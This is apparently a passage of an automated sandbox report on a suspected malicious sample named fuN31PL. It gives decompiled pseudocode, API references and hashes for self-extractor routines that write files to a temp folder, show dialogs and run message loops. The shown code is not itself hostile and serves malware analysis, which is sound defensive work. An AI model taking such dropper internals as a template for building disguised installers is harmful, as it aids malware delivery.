                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1273765764-0
                                                                                                                                                                                                                                              • Opcode ID: 44e9acdcb3d5522a7e934de685259d1feb4a64cd24072cb730afed84ec27b9a0
                                                                                                                                                                                                                                              • Instruction ID: d6fc6445fcb14898fa2785318f27835ba22d47788daf0695bcaa1e13da486a00
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44e9acdcb3d5522a7e934de685259d1feb4a64cd24072cb730afed84ec27b9a0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0011CB35600159BBCB10EF68EE08AAE77B8EF4A310F408150FA22D35A0DB309E85CB95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                                                                                                              			E001A63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				long _v272;
                                                                                                                                                                                                                                              				void* _v276;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                                                                              				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t15 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                              				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_v276 = _a16;
                                                                                                                                                                                                                                              				_t37 = 1;
                                                                                                                                                                                                                                              				E001A1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                              				E001A658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                              				_t28 = 0;
                                                                                                                                                                                                                                              				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                              				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                              					_t28 = _a4;
                                                                                                                                                                                                                                              					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                              						 *0x1a9124 = 0x80070052;
                                                                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					CloseHandle(_t39);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					 *0x1a9124 = 0x80070052;
                                                                                                                                                                                                                                              					_t37 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                              			}















                                                                                                                                                                                                                                              0x001a63cb
                                                                                                                                                                                                                                              0x001a63d2
                                                                                                                                                                                                                                              0x001a63d8
                                                                                                                                                                                                                                              0x001a63ea
                                                                                                                                                                                                                                              0x001a63f3
                                                                                                                                                                                                                                              0x001a6401
                                                                                                                                                                                                                                              0x001a6402
                                                                                                                                                                                                                                              0x001a6410
                                                                                                                                                                                                                                              0x001a6415
                                                                                                                                                                                                                                              0x001a6433
                                                                                                                                                                                                                                              0x001a6438
                                                                                                                                                                                                                                              0x001a6449
                                                                                                                                                                                                                                              0x001a6463
                                                                                                                                                                                                                                              0x001a646d
                                                                                                                                                                                                                                              0x001a6477
                                                                                                                                                                                                                                              0x001a6477
                                                                                                                                                                                                                                              0x001a647a
                                                                                                                                                                                                                                              0x001a643a
                                                                                                                                                                                                                                              0x001a643a
                                                                                                                                                                                                                                              0x001a6444
                                                                                                                                                                                                                                              0x001a6444
                                                                                                                                                                                                                                              0x001a6492

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 001A642D
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 001A645B
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 001A647A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 001A63EB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                              • API String ID: 1065093856-3647970563
                                                                                                                                                                                                                                              • Opcode ID: 5735de31986d20fa5e71a52d43d859d62efb4d0cf87863164d01200d953dea02
                                                                                                                                                                                                                                              • Instruction ID: 28263b393982f6dc6e59855b4f6d29f292b552214040d04c624fd82a2cc8cea3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5735de31986d20fa5e71a52d43d859d62efb4d0cf87863164d01200d953dea02
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F21D2B5A00218AFDB11DF25DC85FEB7778EB5A324F0041A9F595A3280DBB05DC58FA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                                                                              				intOrPtr _t9;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                                                              				intOrPtr* _t22;
                                                                                                                                                                                                                                              				void _t24;
                                                                                                                                                                                                                                              				struct HWND__* _t25;
                                                                                                                                                                                                                                              				struct HWND__* _t26;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				intOrPtr* _t28;
                                                                                                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                                                                                                              				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                              				if(_t34 != 0) {
                                                                                                                                                                                                                                              					_t22 = _t33;
                                                                                                                                                                                                                                              					_t27 = _t22 + 1;
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t6 =  *_t22;
                                                                                                                                                                                                                                              						_t22 = _t22 + 1;
                                                                                                                                                                                                                                              					} while (_t6 != 0);
                                                                                                                                                                                                                                              					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                              					 *_t34 = _t24;
                                                                                                                                                                                                                                              					if(_t24 != 0) {
                                                                                                                                                                                                                                              						_t28 = _t33;
                                                                                                                                                                                                                                              						_t19 = _t28 + 1;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t9 =  *_t28;
                                                                                                                                                                                                                                              							_t28 = _t28 + 1;
                                                                                                                                                                                                                                              						} while (_t9 != 0);
                                                                                                                                                                                                                                              						E001A1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                              						_t11 =  *0x1a91e0; // 0x2988e30
                                                                                                                                                                                                                                              						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                              						 *0x1a91e0 = _t34;
                                                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t25 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              					E001A44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                              					LocalFree(_t34);
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t26 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              				E001A44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                                                              			}















                                                                                                                                                                                                                                              0x001a47e8
                                                                                                                                                                                                                                              0x001a47f0
                                                                                                                                                                                                                                              0x001a47f4
                                                                                                                                                                                                                                              0x001a480f
                                                                                                                                                                                                                                              0x001a4811
                                                                                                                                                                                                                                              0x001a4814
                                                                                                                                                                                                                                              0x001a4814
                                                                                                                                                                                                                                              0x001a4816
                                                                                                                                                                                                                                              0x001a4817
                                                                                                                                                                                                                                              0x001a4829
                                                                                                                                                                                                                                              0x001a482b
                                                                                                                                                                                                                                              0x001a482f
                                                                                                                                                                                                                                              0x001a484f
                                                                                                                                                                                                                                              0x001a4852
                                                                                                                                                                                                                                              0x001a4855
                                                                                                                                                                                                                                              0x001a4855
                                                                                                                                                                                                                                              0x001a4857
                                                                                                                                                                                                                                              0x001a4858
                                                                                                                                                                                                                                              0x001a4860
                                                                                                                                                                                                                                              0x001a4865
                                                                                                                                                                                                                                              0x001a486a
                                                                                                                                                                                                                                              0x001a486f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4876
                                                                                                                                                                                                                                              0x001a4831
                                                                                                                                                                                                                                              0x001a4841
                                                                                                                                                                                                                                              0x001a4847
                                                                                                                                                                                                                                              0x001a480b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a480b
                                                                                                                                                                                                                                              0x001a47f6
                                                                                                                                                                                                                                              0x001a4806
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,001A4E6F), ref: 001A47EA
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 001A4823
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 001A4847
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 001A4851
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                              • API String ID: 359063898-3647970563
                                                                                                                                                                                                                                              • Opcode ID: 422b545b6dfef11b0f061aef59b5fda29997fa069f58b90efd767fbd175398ee
                                                                                                                                                                                                                                              • Instruction ID: 5db7fa8eab8bd521e646b01fc96f04cefcf353ab226cc328032a32777de74bcd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 422b545b6dfef11b0f061aef59b5fda29997fa069f58b90efd767fbd175398ee
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD1102BD6046416FD7198F74AC18F723B5AEBC7310F048519FE828B641DBB98C46C660
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                                                              			E001A6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                              				struct HRSRC__* _t6;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                              				int _t24;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t23 =  *0x1a9a3c; // 0x1a0000
                                                                                                                                                                                                                                              				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                              				if(_t6 == 0) {
                                                                                                                                                                                                                                              					L6:
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					_t24 = _a16;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                              					if(_t21 == 0) {
                                                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_a12 != 0) {
                                                                                                                                                                                                                                              							_push(_a12);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                              						FreeResource(_t21);
                                                                                                                                                                                                                                              						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t24;
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              0x001a651f
                                                                                                                                                                                                                                              0x001a652a
                                                                                                                                                                                                                                              0x001a6534
                                                                                                                                                                                                                                              0x001a656b
                                                                                                                                                                                                                                              0x001a6577
                                                                                                                                                                                                                                              0x001a657c
                                                                                                                                                                                                                                              0x001a6536
                                                                                                                                                                                                                                              0x001a653e
                                                                                                                                                                                                                                              0x001a6542
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6544
                                                                                                                                                                                                                                              0x001a6547
                                                                                                                                                                                                                                              0x001a654c
                                                                                                                                                                                                                                              0x001a6549
                                                                                                                                                                                                                                              0x001a6549
                                                                                                                                                                                                                                              0x001a6549
                                                                                                                                                                                                                                              0x001a655e
                                                                                                                                                                                                                                              0x001a6560
                                                                                                                                                                                                                                              0x001a6569
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6569
                                                                                                                                                                                                                                              0x001a6542
                                                                                                                                                                                                                                              0x001a6587

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(001A0000,000007D6,00000005), ref: 001A652A
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(001A0000,00000000,?,?,001A2EE8,00000000,001A19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 001A6538
                                                                                                                                                                                                                                              • DialogBoxIndirectParamA.USER32(001A0000,00000000,00000547,001A19E0,00000000), ref: 001A6557
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,001A2EE8,00000000,001A19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 001A6560
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1214682469-0
                                                                                                                                                                                                                                              • Opcode ID: a5eccd52ee8412f8e97a41878d1f4fcaef573d4d66ddb2895405a86c09550ddb
                                                                                                                                                                                                                                              • Instruction ID: 44953d3d0d05d1dd26d2df16ce445a1c7fc194a896880c378bdeff0235993bb9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5eccd52ee8412f8e97a41878d1f4fcaef573d4d66ddb2895405a86c09550ddb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 930149B6500205BBCB105FA9AC08DBB7A6DEF8B7A0F080125FE0093150D771CC50C6A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A3680(void* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				struct tagMSG _v36;
                                                                                                                                                                                                                                              				int _t8;
                                                                                                                                                                                                                                              				struct HWND__* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                                                                                                              				_t16 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                              					if(_t8 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                              								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t16 = 1;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                              						} while (_t8 != 0);
                                                                                                                                                                                                                                              						if(_t16 == 0) {
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					break;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t8;
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              0x001a368c
                                                                                                                                                                                                                                              0x001a368f
                                                                                                                                                                                                                                              0x001a3691
                                                                                                                                                                                                                                              0x001a369f
                                                                                                                                                                                                                                              0x001a36a7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a36ba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a36bc
                                                                                                                                                                                                                                              0x001a36bc
                                                                                                                                                                                                                                              0x001a36c0
                                                                                                                                                                                                                                              0x001a36cb
                                                                                                                                                                                                                                              0x001a36c2
                                                                                                                                                                                                                                              0x001a36c4
                                                                                                                                                                                                                                              0x001a36c4
                                                                                                                                                                                                                                              0x001a36da
                                                                                                                                                                                                                                              0x001a36e0
                                                                                                                                                                                                                                              0x001a36e6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a36e6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a36ba
                                                                                                                                                                                                                                              0x001a36ed

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 001A369F
                                                                                                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001A36B2
                                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 001A36CB
                                                                                                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001A36DA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2776232527-0
                                                                                                                                                                                                                                              • Opcode ID: 7d19759f6e689e5a599899d3907e87064f1558611e8700ae23f07c8920fd46d8
                                                                                                                                                                                                                                              • Instruction ID: 532872cb898757eee60ca4407f6c03ce93970f296d35a988520e0be9309a0305
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d19759f6e689e5a599899d3907e87064f1558611e8700ae23f07c8920fd46d8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84014F76A402557BDB304BA69C48FEF7A7CEB87B10F140129F929E2280D7618A85C6A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                                                                              			E001A65E8(char* __ecx) {
                                                                                                                                                                                                                                              				char _t3;
                                                                                                                                                                                                                                              				char _t10;
                                                                                                                                                                                                                                              				char* _t12;
                                                                                                                                                                                                                                              				char* _t14;
                                                                                                                                                                                                                                              				char* _t15;
                                                                                                                                                                                                                                              				CHAR* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t12 = __ecx;
                                                                                                                                                                                                                                              				_t15 = __ecx;
                                                                                                                                                                                                                                              				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                              				_t10 = 0;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t3 =  *_t12;
                                                                                                                                                                                                                                              					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                              				} while (_t3 != 0);
                                                                                                                                                                                                                                              				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                              					if(_t16 <= _t15) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                              						L7:
                                                                                                                                                                                                                                              						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                              							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *_t16 = _t10;
                                                                                                                                                                                                                                              						_t10 = 1;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_push(_t16);
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					return _t10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L11;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              0x001a65e8
                                                                                                                                                                                                                                              0x001a65ed
                                                                                                                                                                                                                                              0x001a65ef
                                                                                                                                                                                                                                              0x001a65f2
                                                                                                                                                                                                                                              0x001a65f4
                                                                                                                                                                                                                                              0x001a65f4
                                                                                                                                                                                                                                              0x001a65f6
                                                                                                                                                                                                                                              0x001a65f7
                                                                                                                                                                                                                                              0x001a6608
                                                                                                                                                                                                                                              0x001a6611
                                                                                                                                                                                                                                              0x001a6618
                                                                                                                                                                                                                                              0x001a661c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a660e
                                                                                                                                                                                                                                              0x001a6623
                                                                                                                                                                                                                                              0x001a6625
                                                                                                                                                                                                                                              0x001a663b
                                                                                                                                                                                                                                              0x001a663b
                                                                                                                                                                                                                                              0x001a663d
                                                                                                                                                                                                                                              0x001a6641
                                                                                                                                                                                                                                              0x001a6610
                                                                                                                                                                                                                                              0x001a6610
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6610
                                                                                                                                                                                                                                              0x001a6644
                                                                                                                                                                                                                                              0x001a6647
                                                                                                                                                                                                                                              0x001a6647
                                                                                                                                                                                                                                              0x001a6621
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,001A2B33), ref: 001A6602
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000), ref: 001A6612
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000), ref: 001A6629
                                                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 001A6635
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Prev$Next
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3260447230-0
                                                                                                                                                                                                                                              • Opcode ID: 54fcd240efb3bdebace0931d4921d115649aab6082283dd33116bc4eb1b844c9
                                                                                                                                                                                                                                              • Instruction ID: 4b152245a1e6c0d1d1b6177e7fca2de8abcbfc8ad684a71a6c3c0e8beffc2763
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54fcd240efb3bdebace0931d4921d115649aab6082283dd33116bc4eb1b844c9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43F0287A5041507EE7321B288C888BBBF9CCF87364B2E01AFE59983401D7250D46C661
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

